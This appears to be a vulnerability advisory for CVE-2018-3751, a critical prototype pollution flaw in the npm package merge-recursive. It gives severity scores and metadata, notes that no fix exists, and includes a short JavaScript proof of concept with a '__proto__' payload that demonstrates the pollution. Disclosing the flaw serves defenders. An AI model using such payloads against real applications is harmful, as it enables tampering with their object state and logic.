CVE-2018-3751 – merge-recursive

Package

Manager: npm
Name: merge-recursive
Vulnerable Version: >=0 <=0.0.3

Severity

Level: Critical

CVSS v3.1: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

EPSS: 0.00332 pctl0.55462

Details

Prototype Pollution in merge-recursive All versions of `merge-recursive` are vulnerable to Prototype Pollution. When malicious user input is merged with another object it allows the attacker to modify the prototype of Object via `__proto__` causing the addition or modification of an existing property. Proof of concept: ```js var merge = require('merge-recursive').recursive; var malicious_payload = '{"__proto__":{"oops":"It works !"}}'; var a = {}; console.log("Before : " + a.oops); merge({}, JSON.parse(malicious_payload)); console.log("After : " + a.oops); ``` ## Recommendation There is currently no fix available.

Metadata

Created: 2018-09-18T13:46:06Z
Modified: 2023-09-12T18:47:20Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/09/GHSA-cvxm-f295-x957/GHSA-cvxm-f295-x957.json
CWE IDs: ["CWE-20"]
Alternative ID: GHSA-cvxm-f295-x957
Finding: F184
Auto approve: 1